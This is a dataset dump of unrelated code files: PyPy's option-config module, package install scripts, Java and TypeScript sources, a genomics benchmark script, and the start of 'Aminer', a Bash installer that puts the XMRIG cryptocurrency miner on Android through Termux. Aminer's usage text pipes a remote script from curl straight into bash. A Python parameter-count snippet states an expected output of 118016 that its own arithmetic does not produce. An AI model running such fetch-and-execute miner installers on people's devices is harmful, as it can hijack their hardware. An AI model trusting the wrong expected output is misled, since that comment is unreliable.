text stringlengths 1 1.05M |
|---|
<filename>pypy/config/config.py
import py
import optparse
from pypy.tool.pairtype import extendabletype
SUPPRESS_USAGE = optparse.SUPPRESS_USAGE
class AmbigousOptionError(Exception):
pass
class NoMatchingOptionFound(AttributeError):
pass
class ConfigError(Exception):
pass
class ConflictConfigError(ConfigError):
pass
class Config(object):
_cfgimpl_frozen = False
def __init__(self, descr, parent=None, **overrides):
self._cfgimpl_descr = descr
self._cfgimpl_value_owners = {}
self._cfgimpl_parent = parent
self._cfgimpl_values = {}
self._cfgimpl_warnings = []
self._cfgimpl_build(overrides)
def _cfgimpl_build(self, overrides):
for child in self._cfgimpl_descr._children:
if isinstance(child, Option):
self._cfgimpl_values[child._name] = child.getdefault()
self._cfgimpl_value_owners[child._name] = 'default'
elif isinstance(child, OptionDescription):
self._cfgimpl_values[child._name] = Config(child, parent=self)
self.override(overrides)
def override(self, overrides):
for name, value in overrides.iteritems():
homeconfig, name = self._cfgimpl_get_home_by_path(name)
homeconfig.setoption(name, value, 'default')
def copy(self, as_default=False, parent=None):
result = Config.__new__(self.__class__)
result._cfgimpl_descr = self._cfgimpl_descr
result._cfgimpl_value_owners = owners = {}
result._cfgimpl_parent = parent
result._cfgimpl_values = v = {}
for child in self._cfgimpl_descr._children:
if isinstance(child, Option):
v[child._name] = self._cfgimpl_values[child._name]
if as_default:
owners[child._name] = 'default'
else:
owners[child._name] = (
self._cfgimpl_value_owners[child._name])
elif isinstance(child, OptionDescription):
v[child._name] = self._cfgimpl_values[child._name].copy(
as_default, parent=result)
return result
def __setattr__(self, name, value):
if self._cfgimpl_frozen and getattr(self, name) != value:
raise TypeError("trying to change a frozen option object")
if name.startswith('_cfgimpl_'):
self.__dict__[name] = value
return
self.setoption(name, value, 'user')
def __getattr__(self, name):
if '.' in name:
homeconfig, name = self._cfgimpl_get_home_by_path(name)
return getattr(homeconfig, name)
if name.startswith('_cfgimpl_'):
# if it were in __dict__ it would have been found already
raise AttributeError("%s object has no attribute %s" %
(self.__class__, name))
if name not in self._cfgimpl_values:
raise AttributeError("%s object has no attribute %s" %
(self.__class__, name))
return self._cfgimpl_values[name]
def __dir__(self):
from_type = dir(type(self))
from_dict = list(self.__dict__)
extras = list(self._cfgimpl_values)
return sorted(set(extras + from_type + from_dict))
def __delattr__(self, name):
# XXX if you use delattr you are responsible for all bad things
# happening
if name.startswith('_cfgimpl_'):
del self.__dict__[name]
return
self._cfgimpl_value_owners[name] = 'default'
opt = getattr(self._cfgimpl_descr, name)
if isinstance(opt, OptionDescription):
raise AttributeError("can't option subgroup")
self._cfgimpl_values[name] = getattr(opt, 'default', None)
def setoption(self, name, value, who):
if name not in self._cfgimpl_values:
raise AttributeError('unknown option %s' % (name,))
child = getattr(self._cfgimpl_descr, name)
oldowner = self._cfgimpl_value_owners[child._name]
if oldowner not in ("default", "suggested"):
oldvalue = getattr(self, name)
if oldvalue == value or who in ("default", "suggested"):
return
raise ConflictConfigError('cannot override value to %s for '
'option %s' % (value, name))
child.setoption(self, value, who)
self._cfgimpl_value_owners[name] = who
def suggest(self, **kwargs):
for name, value in kwargs.items():
self.suggestoption(name, value)
def suggestoption(self, name, value):
try:
self.setoption(name, value, "suggested")
except ConflictConfigError:
# setting didn't work, but that is fine, since it is
# suggested only
pass
def set(self, **kwargs):
all_paths = [p.split(".") for p in self.getpaths()]
for key, value in kwargs.iteritems():
key_p = key.split('.')
candidates = [p for p in all_paths if p[-len(key_p):] == key_p]
if len(candidates) == 1:
name = '.'.join(candidates[0])
homeconfig, name = self._cfgimpl_get_home_by_path(name)
homeconfig.setoption(name, value, "user")
elif len(candidates) > 1:
raise AmbigousOptionError(
'more than one option that ends with %s' % (key, ))
else:
raise NoMatchingOptionFound(
'there is no option that matches %s' % (key, ))
def _cfgimpl_get_home_by_path(self, path):
"""returns tuple (config, name)"""
path = path.split('.')
for step in path[:-1]:
self = getattr(self, step)
return self, path[-1]
def _cfgimpl_get_toplevel(self):
while self._cfgimpl_parent is not None:
self = self._cfgimpl_parent
return self
def add_warning(self, warning):
self._cfgimpl_get_toplevel()._cfgimpl_warnings.append(warning)
def get_warnings(self):
return self._cfgimpl_get_toplevel()._cfgimpl_warnings
def _freeze_(self):
self.__dict__['_cfgimpl_frozen'] = True
return True
def getkey(self):
return self._cfgimpl_descr.getkey(self)
def __hash__(self):
return hash(self.getkey())
def __eq__(self, other):
return self.getkey() == other.getkey()
def __ne__(self, other):
return not self == other
def __iter__(self):
for child in self._cfgimpl_descr._children:
if isinstance(child, Option):
yield child._name, getattr(self, child._name)
def __str__(self, indent=""):
lines = []
children = [(child._name, child)
for child in self._cfgimpl_descr._children]
children.sort()
for name, child in children:
if self._cfgimpl_value_owners.get(name, None) == 'default':
continue
value = getattr(self, name)
if isinstance(value, Config):
substr = value.__str__(indent + " ")
else:
substr = "%s %s = %s" % (indent, name, value)
if substr:
lines.append(substr)
if indent and not lines:
return '' # hide subgroups with all default values
lines.insert(0, "%s[%s]" % (indent, self._cfgimpl_descr._name,))
return '\n'.join(lines)
def getpaths(self, include_groups=False):
"""returns a list of all paths in self, recursively
"""
return self._cfgimpl_descr.getpaths(include_groups=include_groups)
DEFAULT_OPTION_NAME = object()
class Option(object):
__metaclass__ = extendabletype
def __init__(self, name, doc, cmdline=DEFAULT_OPTION_NAME):
self._name = name
self.doc = doc
self.cmdline = cmdline
def validate(self, value):
raise NotImplementedError('abstract base class')
def getdefault(self):
return self.default
def setoption(self, config, value, who):
name = self._name
if who == "default" and value is None:
pass
elif not self.validate(value):
raise ConfigError('invalid value %s for option %s' % (value, name))
config._cfgimpl_values[name] = value
def getkey(self, value):
return value
def convert_from_cmdline(self, value):
return value
def add_optparse_option(self, argnames, parser, config):
callback = ConfigUpdate(config, self)
option = parser.add_option(help=self.doc+" %default",
action='callback', type=self.opt_type,
callback=callback, metavar=self._name.upper(),
*argnames)
class ChoiceOption(Option):
opt_type = 'string'
def __init__(self, name, doc, values, default=None, requires=None,
suggests=None, cmdline=DEFAULT_OPTION_NAME):
super(ChoiceOption, self).__init__(name, doc, cmdline)
self.values = values
self.default = default
if requires is None:
requires = {}
self._requires = requires
if suggests is None:
suggests = {}
self._suggests = suggests
def setoption(self, config, value, who):
name = self._name
for path, reqvalue in self._requires.get(value, []):
toplevel = config._cfgimpl_get_toplevel()
homeconfig, name = toplevel._cfgimpl_get_home_by_path(path)
if who == 'default':
who2 = 'default'
else:
who2 = 'required'
homeconfig.setoption(name, reqvalue, who2)
for path, reqvalue in self._suggests.get(value, []):
toplevel = config._cfgimpl_get_toplevel()
homeconfig, name = toplevel._cfgimpl_get_home_by_path(path)
homeconfig.suggestoption(name, reqvalue)
super(ChoiceOption, self).setoption(config, value, who)
def validate(self, value):
return value is None or value in self.values
def convert_from_cmdline(self, value):
return value.strip()
def _getnegation(optname):
if optname.startswith("without"):
return "with" + optname[len("without"):]
if optname.startswith("with"):
return "without" + optname[len("with"):]
return "no-" + optname
class BoolOption(Option):
def __init__(self, name, doc, default=None, requires=None,
suggests=None, validator=None,
cmdline=DEFAULT_OPTION_NAME, negation=True):
super(BoolOption, self).__init__(name, doc, cmdline=cmdline)
self._requires = requires
self._suggests = suggests
self.default = default
self.negation = negation
self._validator = validator
def validate(self, value):
return isinstance(value, bool)
def setoption(self, config, value, who):
name = self._name
if value and self._validator is not None:
toplevel = config._cfgimpl_get_toplevel()
self._validator(toplevel)
if value and self._requires is not None:
for path, reqvalue in self._requires:
toplevel = config._cfgimpl_get_toplevel()
homeconfig, name = toplevel._cfgimpl_get_home_by_path(path)
if who == 'default':
who2 = 'default'
else:
who2 = 'required'
homeconfig.setoption(name, reqvalue, who2)
if value and self._suggests is not None:
for path, reqvalue in self._suggests:
toplevel = config._cfgimpl_get_toplevel()
homeconfig, name = toplevel._cfgimpl_get_home_by_path(path)
homeconfig.suggestoption(name, reqvalue)
super(BoolOption, self).setoption(config, value, who)
def add_optparse_option(self, argnames, parser, config):
callback = BoolConfigUpdate(config, self, True)
option = parser.add_option(help=self.doc+" %default",
action='callback',
callback=callback, *argnames)
if not self.negation:
return
no_argnames = ["--" + _getnegation(argname.lstrip("-"))
for argname in argnames
if argname.startswith("--")]
if len(no_argnames) == 0:
no_argnames = ["--" + _getnegation(argname.lstrip("-"))
for argname in argnames]
callback = BoolConfigUpdate(config, self, False)
option = parser.add_option(help="unset option set by %s %%default" % (argname, ),
action='callback',
callback=callback, *no_argnames)
class IntOption(Option):
opt_type = 'int'
def __init__(self, name, doc, default=None, cmdline=DEFAULT_OPTION_NAME):
super(IntOption, self).__init__(name, doc, cmdline)
self.default = default
def validate(self, value):
try:
int(value)
except TypeError:
return False
return True
def setoption(self, config, value, who):
try:
super(IntOption, self).setoption(config, int(value), who)
except TypeError, e:
raise ConfigError(*e.args)
class FloatOption(Option):
opt_type = 'float'
def __init__(self, name, doc, default=None, cmdline=DEFAULT_OPTION_NAME):
super(FloatOption, self).__init__(name, doc, cmdline)
self.default = default
def validate(self, value):
try:
float(value)
except TypeError:
return False
return True
def setoption(self, config, value, who):
try:
super(FloatOption, self).setoption(config, float(value), who)
except TypeError, e:
raise ConfigError(*e.args)
class StrOption(Option):
opt_type = 'string'
def __init__(self, name, doc, default=None, cmdline=DEFAULT_OPTION_NAME):
super(StrOption, self).__init__(name, doc, cmdline)
self.default = default
def validate(self, value):
return isinstance(value, str)
def setoption(self, config, value, who):
try:
super(StrOption, self).setoption(config, value, who)
except TypeError, e:
raise ConfigError(*e.args)
class ArbitraryOption(Option):
def __init__(self, name, doc, default=None, defaultfactory=None):
super(ArbitraryOption, self).__init__(name, doc, cmdline=None)
self.default = default
self.defaultfactory = defaultfactory
if defaultfactory is not None:
assert default is None
def validate(self, value):
return True
def add_optparse_option(self, *args, **kwargs):
return
def getdefault(self):
if self.defaultfactory is not None:
return self.defaultfactory()
return self.default
class OptionDescription(object):
__metaclass__ = extendabletype
cmdline = None
def __init__(self, name, doc, children):
self._name = name
self.doc = doc
self._children = children
self._build()
def _build(self):
for child in self._children:
setattr(self, child._name, child)
def getkey(self, config):
return tuple([child.getkey(getattr(config, child._name))
for child in self._children])
def add_optparse_option(self, argnames, parser, config):
return
def getpaths(self, include_groups=False, currpath=None):
"""returns a list of all paths in self, recursively
currpath should not be provided (helps with recursion)
"""
if currpath is None:
currpath = []
paths = []
for option in self._children:
attr = option._name
if attr.startswith('_cfgimpl'):
continue
value = getattr(self, attr)
if isinstance(value, OptionDescription):
if include_groups:
paths.append('.'.join(currpath + [attr]))
currpath.append(attr)
paths += value.getpaths(include_groups=include_groups,
currpath=currpath)
currpath.pop()
else:
paths.append('.'.join(currpath + [attr]))
return paths
class OptHelpFormatter(optparse.TitledHelpFormatter):
extra_useage = None
def expand_default(self, option):
assert self.parser
dfls = self.parser.defaults
defl = ""
choices = None
if option.action == 'callback' and isinstance(option.callback, ConfigUpdate):
callback = option.callback
defl = callback.help_default()
if isinstance(callback.option, ChoiceOption):
choices = callback.option.values
else:
val = dfls.get(option.dest)
if val is None:
pass
elif isinstance(val, bool):
if val is True and option.action=="store_true":
defl = "default"
else:
defl = "default: %s" % val
if option.type == 'choice':
choices = option.choices
if choices is not None:
choices = "%s=%s" % (option.metavar, '|'.join(choices))
else:
choices = ""
if '%default' in option.help:
if choices and defl:
sep = ", "
else:
sep = ""
defl = '[%s%s%s]' % (choices, sep, defl)
if defl == '[]':
defl = ""
return option.help.replace("%default", defl)
elif choices:
return option.help + ' [%s]' % choices
return option.help
def format_usage(self, usage):
# XXX bit of a hack
result = optparse.TitledHelpFormatter.format_usage(self, usage)
if self.extra_useage is not None:
return result + "\n" + self.extra_useage + "\n\n"
return result
class ConfigUpdate(object):
def __init__(self, config, option):
self.config = config
self.option = option
def convert_from_cmdline(self, value):
return self.option.convert_from_cmdline(value)
def __call__(self, option, opt_str, value, parser, *args, **kwargs):
try:
value = self.convert_from_cmdline(value)
self.config.setoption(self.option._name, value, who='cmdline')
except ConfigError, e:
# This OptionValueError is going to exit the translate.py process.
# Now is the last chance to print the warnings, which might give
# more information... hack.
import sys
for warning in self.config.get_warnings():
print >> sys.stderr, warning
raise optparse.OptionValueError(e.args[0])
def help_default(self):
default = getattr(self.config, self.option._name)
owner = self.config._cfgimpl_value_owners[self.option._name]
if default is None:
if owner == 'default':
return ''
else:
default = '???'
return "%s: %s" % (owner, default)
class BoolConfigUpdate(ConfigUpdate):
def __init__(self, config, option, which_value):
super(BoolConfigUpdate, self).__init__(config, option)
self.which_value = which_value
def convert_from_cmdline(self, value):
return self.which_value
def help_default(self):
default = getattr(self.config, self.option._name)
owner = self.config._cfgimpl_value_owners[self.option._name]
if default == self.which_value:
return owner
else:
return ""
def to_optparse(config, useoptions=None, parser=None,
parserargs=None, parserkwargs=None, extra_useage=None):
grps = {}
def get_group(name, doc):
steps = name.split('.')
if len(steps) < 2:
return parser
grpname = steps[-2]
grp = grps.get(grpname, None)
if grp is None:
grp = grps[grpname] = parser.add_option_group(doc)
return grp
if parser is None:
if parserargs is None:
parserargs = []
if parserkwargs is None:
parserkwargs = {}
formatter = OptHelpFormatter()
formatter.extra_useage = extra_useage
parser = optparse.OptionParser(
formatter=formatter,
*parserargs, **parserkwargs)
if useoptions is None:
useoptions = config.getpaths(include_groups=True)
seen = {}
for path in useoptions:
if path.endswith(".*"):
path = path[:-2]
homeconf, name = config._cfgimpl_get_home_by_path(path)
subconf = getattr(homeconf, name)
children = [
path + "." + child
for child in subconf.getpaths()]
useoptions.extend(children)
else:
if path in seen:
continue
seen[path] = True
homeconf, name = config._cfgimpl_get_home_by_path(path)
option = getattr(homeconf._cfgimpl_descr, name)
if option.cmdline is DEFAULT_OPTION_NAME:
chunks = ('--%s' % (path.replace('.', '-'),),)
elif option.cmdline is None:
continue
else:
chunks = option.cmdline.split(' ')
grp = get_group(path, homeconf._cfgimpl_descr.doc)
option.add_optparse_option(chunks, grp, homeconf)
return parser
def make_dict(config):
paths = config.getpaths()
options = dict([(path, getattr(config, path)) for path in paths])
return options
|
#!/bin/bash
mkdir hugo
cd hugo
curl -fL "https://coding-public-generic.pkg.coding.net/public/downloads/hugo-linux-64bit.deb?version=0.88.1" -o hugo-linux-64bit-0.88.1.deb
apt-get -y install ./hugo-linux-64bit-0.88.1.deb
cd ..
|
#!/bin/sh
sudo add-apt-repository ppa:n-muench/vlc
sudo apt-get update
sudo apt-get -y install vlc
|
/*
* Copyright 2017 LinkedIn Corp. Licensed under the BSD 2-Clause License (the "License"). See License in the project root for license information.
*/
package com.linkedin.kafka.cruisecontrol.model;
import com.linkedin.kafka.cruisecontrol.exception.ModelInputException;
import com.linkedin.kafka.cruisecontrol.monitor.sampling.Snapshot;
import java.util.List;
import org.junit.Test;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertTrue;
public class LoadTest {
@Test
public void testSnapshotForTime() throws ModelInputException {
Load load = new Load(3);
Snapshot s1 = new Snapshot(5L);
Snapshot s2 = new Snapshot(3L);
Snapshot s3 = new Snapshot(1L);
load.pushLatestSnapshot(s1);
load.pushLatestSnapshot(s2);
load.pushLatestSnapshot(s3);
assertTrue(load.snapshotForTime(5L) == s1);
assertTrue(load.snapshotForTime(2L) == null);
assertTrue(load.snapshotForTime(3L) == s2);
}
@Test
public void testGetAndMaybeCreateSnapshot() {
Load load = new Load(3);
Snapshot s1 = load.getAndMaybeCreateSnapshot(5L);
Snapshot s2 = load.getAndMaybeCreateSnapshot(1L);
Snapshot s3 = load.getAndMaybeCreateSnapshot(3L);
assertEquals(3, load.numSnapshots());
List<Snapshot> snapshots = load.snapshotsByTime();
assertEquals(5L, snapshots.get(0).time());
assertEquals(3L, snapshots.get(1).time());
assertEquals(1L, snapshots.get(2).time());
assertTrue(s1 == load.getAndMaybeCreateSnapshot(5L));
assertTrue(s2 == load.getAndMaybeCreateSnapshot(1L));
assertTrue(s3 == load.getAndMaybeCreateSnapshot(3L));
}
}
|
#!/bin/bash
#Aim: to benchmark mode1b (well-based dataset with given SNPs)
# on cardelino dataset using 3 tools: bcftools (-R/-T), cellSNP,
# cellsnp-lite (-R/-T)
#Dependency: /usr/bin/time
set -e
set -o pipefail
if [ $# -lt 2 ]; then
echo "" >&2
echo "This script is aimed to benchmark mode1b (well-based dataset with given" >&2
echo "SNPs) on cardelino dataset using 3 tools: bcftools (-R/-T), cellSNP and" >&2
echo "cellsnp-lite (-R/-T)." >&2
echo "" >&2
echo "Usage: $0 <repeat id> <ncore>" >&2
echo "" >&2
echo "<repeat id> i-th repeat, start from 1" >&2
echo "<ncore> number of cores" >&2
echo "" >&2
exit 1
fi
i=$1 # i-th repeat
n=$2 # number of cores
work_dir=`cd $(dirname $0) && pwd`
prog=`basename $0`
if [ -z "$BIN_DIR" ] || [ -z "$DATA_DIR" ] || [ -z "$RES_DIR" ]; then
source $work_dir/../../config.sh > /dev/null
fi
set -u
run=1b_cardelino
util_dir=$work_dir/../utils
out_dir=$RES_DIR/$run/run
if [ ! -d "$out_dir" ]; then mkdir -p $out_dir; fi
echo "[I::$prog] Benchmark $run and output to '$out_dir' ..."
bam_lst=$DATA_DIR/cardelino/carde.bam.lst
sample_lst=$DATA_DIR/cardelino/carde.sample.lst
snp=$DATA_DIR/snp/genome1K.phase3.SNP_AF5e2.chr1toX.hg19.snp.uniq.vcf.gz
fasta=$DATA_DIR/fasta/cellranger.hg19.3.0.0.fa
cell_tag=None
umi_tag=None
min_mapq=20
min_count=1
min_maf=0
min_len=0
set -x
# run bcftools (-R/-T)
for opt in -R -T; do
res_dir=$out_dir/bcftools${opt}_${i}_$n
if [ ! -d "$res_dir" ]; then mkdir -p $res_dir; fi
echo "[I::$prog] bcftools$opt (repeat=$i; ncores=$n) to '$res_dir' ..."
script=$res_dir/bcftools${opt}_${i}_${n}.sh
echo "#!/bin/bash" > $script
echo "set -eu" >> $script
echo "set -o pipefail" >> $script
echo "$BIN_DIR/bcftools mpileup \\" >> $script
echo " -b $bam_lst \\" >> $script
echo " -d 100000 \\" >> $script
echo " -f $fasta \\" >> $script
echo " -q $min_mapq \\" >> $script
echo " -Q 0 \\" >> $script
echo " --excl-flags 1796 \\" >> $script
echo " --incl-flags 0 \\" >> $script
echo " $opt $snp \\" >> $script
echo " -a AD,DP \\" >> $script
echo " -I \\" >> $script
echo " --threads $n \\" >> $script
echo " -Ou | \\" >> $script
echo "$BIN_DIR/bcftools view \\" >> $script
echo " -i 'INFO/DP > 0' \\" >> $script
echo " -V indels \\" >> $script
echo " --threads $n \\" >> $script
echo " -Oz \\" >> $script
echo " -o $res_dir/bcftools.vcf.gz" >> $script
echo "" >> $script
chmod u+x $script
/usr/bin/time -v $BIN_DIR/python $util_dir/memusg -t -H \
$script \
> $res_dir/run.out 2> $res_dir/run.err
sleep 5
done
# run cellSNP
res_dir=$out_dir/cellSNP_${i}_$n
if [ ! -d "$res_dir" ]; then mkdir -p $res_dir; fi
echo "[I::$prog] cellSNP (repeat=$i; ncores=$n) to '$res_dir' ..."
samples=`cat $sample_lst | tr '\n' ',' | sed 's/,$//'`
/usr/bin/time -v $BIN_DIR/python $util_dir/memusg -t -H \
$BIN_DIR/cellSNP \
-S $bam_lst \
-I $samples \
-O $res_dir \
-R $snp \
-p $n \
--cellTAG $cell_tag \
--UMItag $umi_tag \
--minCOUNT $min_count \
--minMAF $min_maf \
--minLEN $min_len \
--minMAPQ $min_mapq \
--maxFLAG 255 \
> $res_dir/run.out 2> $res_dir/run.err
sleep 5
# run cellsnp-lite (-R/-T)
for opt in -R -T; do
res_dir=$out_dir/cellsnp-lite${opt}_${i}_$n
if [ ! -d "$res_dir" ]; then mkdir -p $res_dir; fi
echo "[I::$prog] cellsnp-lite$opt (repeat=$i; ncores=$n) to '$res_dir' ..."
/usr/bin/time -v $BIN_DIR/python $util_dir/memusg -t -H \
$BIN_DIR/cellsnp-lite \
-S $bam_lst \
-i $sample_lst \
-O $res_dir \
$opt $snp \
-p $n \
--cellTAG $cell_tag \
--UMItag $umi_tag \
--minCOUNT $min_count \
--minMAF $min_maf \
--minLEN $min_len \
--minMAPQ $min_mapq \
--exclFLAG 1796 \
--inclFLAG 0 \
--gzip \
--genotype \
> $res_dir/run.out 2> $res_dir/run.err
sleep 5
done
echo "[I::$prog] Done!"
|
"use strict";
Object.defineProperty(exports, "__esModule", {
value: true
});
exports.windows8 = void 0;
var windows8 = {
"viewBox": "0 0 16 16",
"children": [{
"name": "path",
"attribs": {
"fill": "#000000",
"d": "M0.005 8l-0.005-4.876 6-0.815v5.691zM7 2.164l7.998-1.164v7h-7.998zM15 9l-0.002 7-7.998-1.125v-5.875zM6 14.747l-5.995-0.822-0-4.926h5.995z"
}
}]
};
exports.windows8 = windows8; |
from typing import List, Tuple
def count_parameters(layers: List[Tuple[int, int, int]]) -> int:
total_params = 0
for layer in layers:
input_channels, output_channels, kernel_size = layer
params = (input_channels * output_channels * kernel_size**2) + output_channels
total_params += params
return total_params
# Test the function with the provided example
print(count_parameters([(3, 64, 3), (64, 128, 3), (128, 256, 3)])) # Output: 118016 |
/*
* Copyright 2014 akquinet engineering GmbH
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*/
package de.akquinet.engineering.vaadinator.example.crmws.model;
import java.io.Serializable;
import java.util.Date;
import javax.persistence.Entity;
import javax.persistence.FetchType;
import javax.persistence.GeneratedValue;
import javax.persistence.GenerationType;
import javax.persistence.Id;
import javax.persistence.ManyToOne;
import javax.persistence.Table;
import javax.persistence.Temporal;
import javax.persistence.TemporalType;
import de.akquinet.engineering.vaadinator.annotations.MapBean;
import de.akquinet.engineering.vaadinator.annotations.MapBeanSetting;
import de.akquinet.engineering.vaadinator.annotations.MapProperty;
import de.akquinet.engineering.vaadinator.annotations.MapPropertySetting;
import de.akquinet.engineering.vaadinator.annotations.ServiceBean;
import de.akquinet.engineering.vaadinator.example.crmws.dto.HistoryDto;
@MapBean(profiles = { @MapBeanSetting(profileName = "contactInclHistory", target = HistoryDto.class),
@MapBeanSetting(profileName = "historyOnly", target = HistoryDto.class, bidirectional = true) })
@Entity
@Table(name="CrmHistory")
@ServiceBean
public class History implements Serializable {
/**
*
*/
private static final long serialVersionUID = 1L;
@Id
@GeneratedValue(strategy = GenerationType.IDENTITY)
@MapProperty(profileSettings = { @MapPropertySetting(profileName = "contactInclHistory", readonly = true),
@MapPropertySetting(profileName = "historyOnly", readonly = true) })
private long id;
@MapProperty
@Temporal(TemporalType.TIMESTAMP)
private Date timestamp = new Date();
@MapProperty
private String text;
@ManyToOne(fetch = FetchType.LAZY)
private Contact parentContact = null;
public long getId() {
return id;
}
void setId(long id) {
this.id = id;
}
public Date getTimestamp() {
return timestamp;
}
public void setTimestamp(Date timestamp) {
this.timestamp = timestamp;
}
public String getText() {
return text;
}
public void setText(String text) {
this.text = text;
}
public Contact getParentContact() {
return parentContact;
}
public void setParentContact(Contact parentContact) {
this.parentContact = parentContact;
}
}
|
<reponame>n1kk018/OnWine-Admin
export * from './orderColumnChart.component';
|
<filename>src/scripts/helpers/generateDungeonRun.ts<gh_stars>0
import { DungeonLevelData, DungeonRunData } from '../models/DungeonRunData';
import { SecondaryContentBlock } from '../models/SecondaryContentBlock';
import { RuneAssignment } from './constants';
import ContentDataLibrary from './ContentDataLibrary';
import globalState from '../worldstate/index';
const CHANCE_FOR_MATCHING_SECONDARY_CONTENT = 0.5;
export const generateDungeonRun: (runes: RuneAssignment) => DungeonRunData = (runes) => {
const matchingPrimaryContents = ContentDataLibrary.primaryContent.filter((primaryContent) => {
if (!primaryContent.themes.includes(runes.primaryContent)) {
return false;
}
const requiredQuests = primaryContent.requiredQuests || [];
const unmetPrecondition = requiredQuests.find(([questId, requiredStatus]) => {
const quest = globalState.quests[questId];
switch (requiredStatus) {
case 'open': {
return !!quest;
}
case 'started': {
return !quest || quest.questFinished;
}
case 'not-finished': {
return quest && quest.questFinished;
}
case 'finished': {
return !quest || !quest.questFinished;
}
}
});
return !unmetPrecondition;
});
const randomIndex = Math.floor(Math.random() * matchingPrimaryContents.length);
const selectedPrimaryContent = matchingPrimaryContents[randomIndex];
// tslint:disable-next-line: no-console
console.log(`--> Using primary block ${selectedPrimaryContent.title}`);
const { lowerBoundOfSecondaryContentBlocks, upperBoundOfSecondaryContentBlocks } =
selectedPrimaryContent;
const numSecondaryContents =
lowerBoundOfSecondaryContentBlocks +
Math.floor(
Math.random() * (upperBoundOfSecondaryContentBlocks - lowerBoundOfSecondaryContentBlocks + 1)
);
const secondaryContentBlocks: SecondaryContentBlock[] = [];
const matchingSecondaryBlocks = ContentDataLibrary.secondaryContent.filter((secondaryContent) =>
secondaryContent.themes.includes(runes.secondaryContent)
);
const nonMatchingSecondaryBlocks = ContentDataLibrary.secondaryContent.filter(
(secondaryContent) => !secondaryContent.themes.includes(runes.secondaryContent)
);
for (let i = 0; i < numSecondaryContents; i++) {
let usedSecondaryBlock: SecondaryContentBlock;
if (Math.random() < CHANCE_FOR_MATCHING_SECONDARY_CONTENT) {
const randomSecondaryIndex = Math.floor(Math.random() * matchingSecondaryBlocks.length);
usedSecondaryBlock = matchingSecondaryBlocks.splice(randomSecondaryIndex, 1)[0];
// tslint:disable-next-line: no-console
console.log(`--> Using matching secondary block ${usedSecondaryBlock.title}`);
} else {
const randomSecondaryIndex = Math.floor(Math.random() * nonMatchingSecondaryBlocks.length);
usedSecondaryBlock = nonMatchingSecondaryBlocks.splice(randomSecondaryIndex, 1)[0];
// tslint:disable-next-line: no-console
console.log(`--> Using non-matching secondary block ${usedSecondaryBlock.title}`);
}
secondaryContentBlocks.push(usedSecondaryBlock);
}
const secondaryContentRoomAssignment: { [level: number]: string[] } = {};
secondaryContentBlocks.forEach((contentBlock) => {
let firstFreeLevel = 0;
for (let i = 0; i < contentBlock.rooms.length; i++) {
const blocksLeftToPlace = contentBlock.rooms.length - i - 1;
const roomMaxLevel = selectedPrimaryContent.dungeonLevels.length - blocksLeftToPlace;
const randomLevel =
firstFreeLevel + Math.floor((roomMaxLevel - firstFreeLevel) * Math.random());
if (!secondaryContentRoomAssignment[randomLevel]) {
secondaryContentRoomAssignment[randomLevel] = [];
}
secondaryContentRoomAssignment[randomLevel].push(...contentBlock.rooms[i]);
firstFreeLevel = randomLevel + 1;
}
});
const levels: DungeonLevelData[] = selectedPrimaryContent.dungeonLevels.map(
(dungeonLevel, level) => ({
...dungeonLevel,
rooms: [...dungeonLevel.rooms, ...(secondaryContentRoomAssignment[level] || [])],
isDungeon: true,
})
);
return {
levels,
buff: runes.playerBuff,
primaryContentBlock: selectedPrimaryContent,
secondaryContentBlocks,
};
};
|
#!/usr/bin/env bash
#=============================================================
# https://github.com/cornjosh/Aminer
# A script that help you install miner software XMRIG on Android device
# Version: 1.0
# Author: cornjosh
# Blog: https://linkyou.top
#=============================================================
USER="12345"
PASS=''
ALGO="astrobwt"
MIMING_URL="mine.c3pool.com:13333"
VERSION=1.0
TOS=''
UBUNTU_VERSION=20.04.1
DONATE=1
RED_FONT_PREFIX="\033[31m"
LIGHT_GREEN_FONT_PREFIX="\033[1;32m"
LIGHT_BLUE_FONT_PREFIX="\033[1;34m"
FONT_COLOR_SUFFIX="\033[0m"
INFO(){
echo -e "[${LIGHT_GREEN_FONT_PREFIX}INFO${FONT_COLOR_SUFFIX}] $1"
}
ERROR(){
echo -e "[${RED_FONT_PREFIX}ERROR${FONT_COLOR_SUFFIX}] $1"
}
HEAD(){
echo -e "${LIGHT_BLUE_FONT_PREFIX}##### $1 #####${FONT_COLOR_SUFFIX}"
}
HELLO(){
HEAD "Aminer"
echo "Aminer is a script that help you install miner software XMRIG on Android device. @v$VERSION
You can find the source code from https://github.com/cornjosh/Aminer
"
[ "$TOS" == '' ] && read -e -p "You are already understand the risks of the script.(Y/n)" TOS
[ "$TOS" == 'n' ] || [ "$TOS" == 'N' ] && ERROR "Canceled by user" && exit 0
}
USAGE(){
echo "Aminer - A script that help you install miner software XMRIG on Android device @v$VERSION
Usage:
bash <(curl -fsSL git.io/aminer) [options...] <arg>
Options:
-y Auto mode, ignore risks warning
-u Pool's user, the arguments like [username]
-p Pool's password, the arguments like [password]
-a mining algorithm
-o Pool's url, the arguments like [mine.pool.example:1234]
-d Donate level to XMRIG's developers (not me),the arguments like [1]
-g Setup sshd with Github name, the arguments like [cornjosh]"
# -o Overwrite mode, this option is valid at the top
# -g Get the public key from GitHub, the arguments is the GitHub ID
# -u Get the public key from the URL, the arguments is the URL
# -f Get the public key from the local file, the arguments is the local file path
# -p Change SSH port, the arguments is port number
# -d Disable password login
}
GET_PASS(){
[ "$PASS" == '' ] && PASS="Aminer-$(getprop ro.product.vendor.model|sed s/[[:space:]]//g)"
}
UBUNTU(){
INFO "Upgrading packages" && pkg update && pkg upgrade -y
INFO "Installing dependency" && pkg install wget proot -y
cd "$HOME" || exit
mkdir ubuntu-in-termux && INFO "Create $HOME/ubuntu-in-termux"
UBUNTU_DOWNLOAD
UBUNTU_INSTALL
INFO "Ubuntu setup complete"
}
UBUNTU_DOWNLOAD(){
HEAD "Download Ubuntu"
cd "$HOME/ubuntu-in-termux" || exit
[ -f "ubuntu.tar.gz" ] && rm -rf ubuntu.tar.gz && INFO "Remove old ubuntu image"
local ARCHITECTURE=$(dpkg --print-architecture)
case "$ARCHITECTURE" in
aarch64)
ARCHITECTURE=arm64
;;
arm)
ARCHITECTURE=armhf
;;
amd64|x86_64)
ARCHITECTURE=amd64
;;
